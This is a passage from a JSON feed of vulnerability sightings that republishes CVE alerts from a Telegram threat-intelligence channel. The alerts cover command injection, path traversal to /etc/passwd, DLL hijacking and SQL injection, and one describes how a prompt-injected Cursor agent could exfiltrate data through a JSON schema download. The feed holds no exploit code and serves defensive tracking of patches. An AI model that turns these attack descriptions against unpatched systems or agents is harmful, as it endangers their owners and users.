Modified: 2025-06-10T13:59:10.422Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f962-hw26-g267\n2. https://github.com/nextcloud/server/pull/41123\n3. https://hackerone.com/reports/2212627", "creation_timestamp": "2025-06-10T14:30:30.000000Z"}, {"uuid": "7088a5be-dac5-47d7-8df9-f1445ad4ce4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G4CF-PP4X-HQGW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17782", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49141\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.3, the `gitImportSite` functionality obtains a URL string from a POST request and insufficiently validates user input. The `set_remote` function later passes this input into `proc_open`, yielding OS command injection. An authenticated attacker can craft a URL string that bypasses the validation checks employed by the `filter_var` and `strpos` functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request. Version 11.0.3 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-09T21:11:08.889Z\n\ud83d\udccf Modified: 2025-06-09T21:11:08.889Z\n\ud83d\udd17 References:\n1. https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw\n2. https://github.com/haxtheweb/haxcms-nodejs/commit/5131fea6b6be611db76a618f89bd2e164752e9b3", "creation_timestamp": "2025-06-09T21:31:56.000000Z"}, {"uuid": "6de1ad3a-a76e-4829-9f22-14e77e970ed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F26W-GH5M-QQ77", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17781", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49140\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Pion Interceptor is a framework for building RTP/RTCP communication software. Versions v0.1.36 through v0.1.38 contain a bug in a RTP packet factory that can be exploited to trigger a panic with Pion based SFU via crafted RTP packets, This only affect users that use pion/interceptor. Users should upgrade to v0.1.39 or later, which validates that: `padLen &gt; 0 &amp;&amp; padLen &lt;= payloadLength` and return error  on overflow, avoiding panic. If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload.\n\ud83d\udccf Published: 2025-06-09T21:13:12.388Z\n\ud83d\udccf Modified: 2025-06-09T21:13:12.388Z\n\ud83d\udd17 References:\n1. https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77\n2. https://github.com/pion/webrtc/issues/3148\n3. https://github.com/pion/interceptor/pull/338\n4. https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5", "creation_timestamp": "2025-06-09T21:31:55.000000Z"}, {"uuid": "2e86153e-954c-4fe9-a08f-a7b35240c7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HXRR-X32W-CG8G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17784", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49138\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, an authenticated Local File Inclusion (LFI) vulnerability in the HAXCMS saveOutline endpoint allows a low-privileged user to read arbitrary files on the server by manipulating the location field written into site.json. This enables attackers to exfiltrate sensitive system files such as /etc/passwd, application secrets, or configuration files accessible to the web server (www-data). The vulnerability stems from the way the HAXCMS backend handles the location field in the site's outline. When a user sends a POST request to /system/api/saveOutline, the backend stores the provided location value directly into the site.json file associated with the site, without validating or sanitizing the input. Later the location parameter is interpreted by the CMS to resolve and load the content for a given node. If the location field contains a relative path like `../../../etc/passwd`, the application will attempt to read and render that file. Version 11.0.0 fixes the issue.\n\ud83d\udccf Published: 2025-06-09T21:05:23.245Z\n\ud83d\udccf Modified: 2025-06-09T21:05:23.245Z\n\ud83d\udd17 References:\n1. https://github.com/haxtheweb/issues/security/advisories/GHSA-hxrr-x32w-cg8g\n2. https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/HAXCMSSite.php#L1248", "creation_timestamp": "2025-06-09T21:31:58.000000Z"}, {"uuid": "b67c23f5-5d3d-4e3d-a3a1-4ad41b8b1108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC8M-W37W-24HW", "type": "seen", "source": "Telegram/UoNmOvyrT0xD6ttUxw0GWEmNWGrIstm3XawCByymdxwMbjs", "content": "", "creation_timestamp": "2026-04-21T19:24:58.000000Z"}, {"uuid": "7e0eb68a-782e-47cf-a607-459793582b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M9JH-JF9H-X3H2", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17895", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48067\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)\n\ud83d\udd39 Description: OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.11.1 contain a vulnerability that allows an attacker with the FILE_UPLOAD permission to exfiltrate files from the host that OctoPrint has read access to, by moving them into the upload folder where they then can be downloaded from. This vulnerability is fixed in 1.11.2.\n\ud83d\udccf Published: 2025-06-10T15:19:44.186Z\n\ud83d\udccf Modified: 2025-06-10T15:19:44.186Z\n\ud83d\udd17 References:\n1. https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-m9jh-jf9h-x3h2", "creation_timestamp": "2025-06-10T15:30:50.000000Z"}, {"uuid": "2682ce81-fbdc-4f55-85bd-5b0de9c32497", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9H3V-H59J-V6RJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49150\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Cursor is a code editor built for programming with AI. Prior to 0.51.0, by default, the setting json.schemaDownload.enable was set to True. This means that by writing a JSON file, an attacker can trigger an arbitrary HTTP GET request that does not require user confirmation. Since the Cursor Agent can edit JSON files, this means a malicious agent, for example, after a prompt injection attack already succeeded, could trigger a GET request to an attacker controlled URL, potentially exfiltrating other data the agent may have access to. This vulnerability is fixed in 0.51.0.\n\ud83d\udccf Published: 2025-06-11T17:49:43.910Z\n\ud83d\udccf Modified: 2025-06-11T18:19:11.056Z\n\ud83d\udd17 References:\n1. https://github.com/getcursor/cursor/security/advisories/GHSA-9h3v-h59j-v6rj", "creation_timestamp": "2025-06-11T18:34:56.000000Z"}, {"uuid": "beaaee20-4ab7-43df-8629-2da6026a560b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5R9W-9FG6-266Q", "type": "seen", "source": "Telegram/raJRCian8jdwH_ZHMkV6wtcQApYY70x43uMZTCVVg-5BoqY", "content": "", "creation_timestamp": "2026-04-21T19:26:26.000000Z"}, {"uuid": "f6f7c713-c759-440d-be2f-b109a954e081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W253-42QP-5F2X", "type": "seen", "source": "Telegram/raJRCian8jdwH_ZHMkV6wtcQApYY70x43uMZTCVVg-5BoqY", "content": "", "creation_timestamp": "2026-04-21T19:26:26.000000Z"}, {"uuid": "c935f2c2-f72d-4029-bc95-e22a0f2851b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FHC-F3MR-W6H6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18077", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-48310\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: TestingPlatform is a testing platform for Internet Security Standards. Prior to version 2.1.1, user input is not filtered correctly. Nmap options are accepted. In this particular case, the option to create log files is accepted in addition to a host name (and even without). A log file is created at the location specified. These files are created as root. If the file exists, the existing file is being rendered useless. This can result in denial of service. Additionally, input for scanning can be any CIDR blocks passed to nmap. An attacker can scan 0.0.0.0/0 or even local networks. Version 2.1.1 contains a patch for this issue.\n\ud83d\udccf Published: 2023-11-20T23:07:13.720Z\n\ud83d\udccf Modified: 2025-06-11T14:04:56.455Z\n\ud83d\udd17 References:\n1. https://github.com/NC3-LU/TestingPlatform/security/advisories/GHSA-9fhc-f3mr-w6h6\n2. https://github.com/NC3-LU/TestingPlatform/security/advisories/GHSA-mmpf-rw6c-67mm\n3. https://github.com/NC3-LU/TestingPlatform/commit/7b3e7ca869a4845aa7445f874c22c5929315c3a7\n4. https://github.com/NC3-LU/TestingPlatform/releases/tag/v2.1.1", "creation_timestamp": "2025-06-11T14:31:29.000000Z"}, {"uuid": "a0971fbf-12b6-45e9-8ef8-9bf3b5c81862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQX8-2XMM-JRV8", "type": "seen", "source": "Telegram/raJRCian8jdwH_ZHMkV6wtcQApYY70x43uMZTCVVg-5BoqY", "content": "", "creation_timestamp": "2026-04-21T19:26:26.000000Z"}, {"uuid": "92a82eb5-c9bb-44f3-90fa-b878bd056d5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJW8-8C5C-9R79", "type": "published-proof-of-concept", "source": "Telegram/tNtN6ajST1i0h_Z4W2szdcVpxF1Em9wIkkVyc-W9Ntpka1A", "content": "", "creation_timestamp": "2026-04-17T23:20:34.000000Z"}, {"uuid": "19d2dad6-a150-400d-acbf-cc8634175f79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC47-H83G-2R8J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18085", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49148\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: ClipShare is a lightweight and cross-platform tool for clipboard sharing. Prior to 3.8.5, ClipShare Server for Windows uses the default Windows DLL search order and loads system libraries like CRYPTBASE.dll and WindowsCodecs.dll from its own directory before the system path. A local, non-privileged user who can write to the folder containing clip_share.exe can place malicious DLLs there, leading to arbitrary code execution in the context of the server, and, if launched by an Administrator (or another elevated user), it results in a reliable local privilege escalation. This vulnerability is fixed in 3.8.5.\n\ud83d\udccf Published: 2025-06-11T14:53:48.591Z\n\ud83d\udccf Modified: 2025-06-11T15:05:08.241Z\n\ud83d\udd17 References:\n1. https://github.com/thevindu-w/clip_share_server/security/advisories/GHSA-rc47-h83g-2r8j", "creation_timestamp": "2025-06-11T15:32:04.000000Z"}, {"uuid": "3ea191d5-a5e0-410e-9287-1756de43f49a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JWR7-992G-68MH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18220", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49577\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Various preferences messages are inserted into raw HTML, allowing anybody who can edit those messages to insert arbitrary HTML into the DOM. This vulnerability is fixed in 3.3.1.\n\ud83d\udccf Published: 2025-06-12T18:45:18.415Z\n\ud83d\udccf Modified: 2025-06-12T19:01:58.426Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-jwr7-992g-68mh\n2. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/93c36ac778397e0e7c46cf7adb1e5d848265f1bd\n3. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/a741639085d70c22a9f49890542a142a223bf981", "creation_timestamp": "2025-06-12T19:33:51.000000Z"}, {"uuid": "379c524a-c188-48ae-a113-e0291839cc19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X97G-H2VP-G2C5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19997", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53096\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Sunshine is a self-hosted game stream host for Moonlight. Prior to version 2025.628.4510, the web UI of Sunshine lacks protection against Clickjacking attacks. This vulnerability allows an attacker to embed the Sunshine interface within a malicious website using an invisible or disguised iframe. If a user is tricked into interacting (one or multiple clicks) with the malicious page while authenticated, they may unknowingly perform actions within the Sunshine application without their consent. This issue has been patched in version 2025.628.4510.\n\ud83d\udccf Published: 2025-07-01T01:33:01.336Z\n\ud83d\udccf Modified: 2025-07-01T01:33:01.336Z\n\ud83d\udd17 References:\n1. https://github.com/LizardByte/Sunshine/security/advisories/GHSA-x97g-h2vp-g2c5\n2. https://github.com/LizardByte/Sunshine/commit/2f27a57d01911436017f87bf08b9e36dcfaa86cc", "creation_timestamp": "2025-07-01T02:07:42.000000Z"}, {"uuid": "13675136-a629-44c1-b3b8-d2abf1584263", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPV9-C2GV-2J82", "type": "seen", "source": "Telegram/5jFlrKy1YlFFC2zo3JzgQk5Ry2crUJcwyAKkfj888Y7MPt0", "content": "", "creation_timestamp": "2026-04-21T19:26:03.000000Z"}, {"uuid": "00f9139f-d259-4a92-80a5-45aba4529f1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CV36-2J23-X6G3", "type": "seen", "source": "Telegram/raJRCian8jdwH_ZHMkV6wtcQApYY70x43uMZTCVVg-5BoqY", "content": "", "creation_timestamp": "2026-04-21T19:26:26.000000Z"}, {"uuid": "5dfd76cf-72d6-4287-b945-1c7c5f32f3f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73F2-P9JR-M44X", "type": "seen", "source": "Telegram/raJRCian8jdwH_ZHMkV6wtcQApYY70x43uMZTCVVg-5BoqY", "content": "", "creation_timestamp": "2026-04-21T19:26:26.000000Z"}, {"uuid": "5572b9cf-1a17-4a97-80b2-b2042d02a712", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRWH-7838-XF82", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18174", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56158\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. It's possible to execute any SQL query in Oracle by using the function like DBMS_XMLGEN or DBMS_XMLQUERY. The XWiki query validator does not sanitize functions that would be used in a simple select and Hibernate allows using any native function in an HQL query. This vulnerability is fixed in 16.10.2, 16.4.7, and 15.10.16.\n\ud83d\udccf Published: 2025-06-12T14:56:56.939Z\n\ud83d\udccf Modified: 2025-06-12T15:23:33.935Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-prwh-7838-xf82\n2. https://jira.xwiki.org/browse/XWIKI-22734", "creation_timestamp": "2025-06-12T15:33:50.000000Z"}, {"uuid": "20a3134a-fa21-4adb-a483-2db1a71d7e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6G5-P62X-58HW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18200", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43863\n\ud83d\udd25 CVSS Score: 1.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. If attacker gets access to an authenticated session, they can try to brute-force the user password by using the change password functionality: they can call that route infinitely which will return the message that password is wrong until it is correct. This vulnerability is fixed in 4.11.\n\ud83d\udccf Published: 2025-06-12T17:29:57.047Z\n\ud83d\udccf Modified: 2025-06-12T17:29:57.047Z\n\ud83d\udd17 References:\n1. https://github.com/vantage6/vantage6/security/advisories/GHSA-j6g5-p62x-58hw", "creation_timestamp": "2025-06-12T17:35:00.000000Z"}, {"uuid": "8f14390a-a55b-4795-8f05-bebaf9c1defd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2029", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10234\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server.\n\ud83d\udccf Published: 2024-10-22T13:17:57.891Z\n\ud83d\udccf Modified: 2025-06-10T20:58:55.120Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2025\n2. https://access.redhat.com/errata/RHSA-2025:2026\n3. https://access.redhat.com/errata/RHSA-2025:2029\n4. https://access.redhat.com/security/cve/CVE-2024-10234\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "creation_timestamp": "2025-06-10T21:32:06.000000Z"}, {"uuid": "77079a9a-28af-40b7-b826-c89f39b3cc85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2026", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10234\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server.\n\ud83d\udccf Published: 2024-10-22T13:17:57.891Z\n\ud83d\udccf Modified: 2025-06-10T20:58:55.120Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2025\n2. https://access.redhat.com/errata/RHSA-2025:2026\n3. https://access.redhat.com/errata/RHSA-2025:2029\n4. https://access.redhat.com/security/cve/CVE-2024-10234\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "creation_timestamp": "2025-06-10T21:32:06.000000Z"}, {"uuid": "6dccca89-efc9-4876-9378-a7967bd5c098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5G4-V748-6FH8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18231", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31476\n\ud83d\udd25 CVSS Score: 4.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: tarteaucitron.js is a compliant and accessible cookie banner. A vulnerability was identified in tarteaucitron.js, allowing a user with high privileges (access to the site's source code or a CMS plugin) to enter a URL containing an insecure scheme such as javascript:alert(). Before the fix, URL validation was insufficient, which could allow arbitrary JavaScript execution if a user clicked on a malicious link. An attacker with high privileges could insert a link exploiting an insecure URL scheme, leading to execution of arbitrary JavaScript code, theft of sensitive data through phishing attacks, or modification of the user interface behavior. This vulnerability is fixed in 1.20.1.\n\ud83d\udccf Published: 2025-04-07T14:52:12.728Z\n\ud83d\udccf Modified: 2025-06-12T21:03:38.700Z\n\ud83d\udd17 References:\n1. https://github.com/AmauriC/tarteaucitron.js/security/advisories/GHSA-p5g4-v748-6fh8\n2. https://github.com/AmauriC/tarteaucitron.js/commit/2fa1e01023bce2e4b813200600bb1619d56ceb02", "creation_timestamp": "2025-06-12T21:34:38.000000Z"}, {"uuid": "e3cd877e-46e2-42bf-84c6-d6e16aa026e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JM43-HRQ7-R7W6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18312", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49580\n\ud83d\udd25 CVSS Score: 8.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. From 8.2 and 7.4.5 until 17.1.0-rc-1, 16.10.4, and 16.4.7, pages can gain script or programming rights when they contain a link and the target of the link is renamed or moved. This might lead to execution of scripts contained in xobjects that should have never been executed. This vulnerability is fixed in 17.1.0-rc-1, 16.10.4, and 16.4.7.\n\ud83d\udccf Published: 2025-06-13T15:45:58.451Z\n\ud83d\udccf Modified: 2025-06-13T15:56:24.272Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jm43-hrq7-r7w6\n2. https://github.com/xwiki/xwiki-platform/commit/ab209acd780da69a4c5ff77ff011efd698273cec\n3. https://jira.xwiki.org/browse/XWIKI-22836", "creation_timestamp": "2025-06-13T16:37:17.000000Z"}, {"uuid": "79823392-e647-4760-8822-883eaefabc17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4H5P-7F5C-Q7GJ", "type": "seen", "source": "Telegram/5jFlrKy1YlFFC2zo3JzgQk5Ry2crUJcwyAKkfj888Y7MPt0", "content": "", "creation_timestamp": "2026-04-21T19:26:03.000000Z"}, {"uuid": "2c83750e-30cb-48e9-b8c2-00254942ad07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ2P-2789-3747", "type": "seen", "source": "Telegram/5jFlrKy1YlFFC2zo3JzgQk5Ry2crUJcwyAKkfj888Y7MPt0", "content": "", "creation_timestamp": "2026-04-21T19:26:03.000000Z"}, {"uuid": "2f2d38f3-f38a-4136-99b6-2b5e6e8894f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CRH-39QV-FXJ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18039", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1243\n\ud83d\udd25 CVSS Score: 9.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Improper input validation in the Wazuh agent for Windows prior to version 4.8.0 allows an attacker with control over the Wazuh server or agent key to configure the agent to connect to a malicious UNC path. This results in the leakage of the machine account NetNTLMv2 hash, which can be relayed for remote code execution or used to escalate privileges to SYSTEM via AD CS certificate forging and other similar attacks.\n\ud83d\udccf Published: 2025-06-11T01:15:13.116Z\n\ud83d\udccf Modified: 2025-06-11T01:15:13.116Z\n\ud83d\udd17 References:\n1. https://pentraze.com/\n2. https://pentraze.com/vulnerability-reports/CVE-2024-1243/\n3. https://github.com/wazuh/wazuh/security/advisories/GHSA-3crh-39qv-fxj7", "creation_timestamp": "2025-06-11T02:37:03.000000Z"}, {"uuid": "fc105c6d-6ba8-4f55-9dc7-d704d9488a13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FF4-MMHV-X6JP", "type": "seen", "source": "Telegram/5jFlrKy1YlFFC2zo3JzgQk5Ry2crUJcwyAKkfj888Y7MPt0", "content": "", "creation_timestamp": "2026-04-21T19:26:03.000000Z"}, {"uuid": "b9b3c41d-0488-4c07-b7d1-2fb24d10c748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R85M-5MC9-CC9W", "type": "seen", "source": "Telegram/_7LxZqv0cQVHoNpqLOWIbwSusYQhcyhFNDJo8krQGjg00Ro", "content": "", "creation_timestamp": "2026-04-21T19:26:45.000000Z"}, {"uuid": "7b462cc4-bf9e-48e0-acb4-2a8d3b32a300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24RP-Q3W6-VC56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18199", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1597\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.28 are 